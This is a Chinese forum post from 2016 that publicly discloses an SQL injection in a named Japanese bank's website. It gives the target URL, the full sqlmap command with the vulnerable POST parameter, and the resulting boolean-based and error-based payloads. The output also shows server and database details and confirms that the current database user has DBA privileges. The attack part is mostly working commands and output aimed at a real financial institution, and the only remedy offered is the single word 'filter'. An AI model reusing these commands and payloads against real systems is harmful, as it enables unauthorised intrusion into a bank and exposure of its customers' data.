HanDs
管理员

[7月漏洞公开] 日本東和銀行存在SQL注入(DBA权限) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

Microsoft SQL Server 2012!!!

详细说明:

code 区域
website: http://www.towabank.co.jp/index.asp

python sqlmap.py -u "http://www.towabank.co.jp/index.asp" -p MenuNo --technique=BE --form --random-agent

漏洞证明:

code 区域
---
Parameter: MenuNo (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
Payload: MenuNo=(SELECT (CASE WHEN (4746=4746) THEN CHAR(118)+CHAR(87)+CHAR(71)+CHAR(120) ELSE 4746*(SELECT 4746 FROM master..sysdatabases) END))

Type: error-based
Title: Microsoft SQL Server/Sybase error-based - Parameter replace
Payload: MenuNo=(CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3061=3061) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113))))
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012
current user: 'FsolAdmin'
current user is DBA: True
database management system users [1]:
[*] ##MS_AgentSigningCertificate##

修复方案:

过滤


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
日本
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复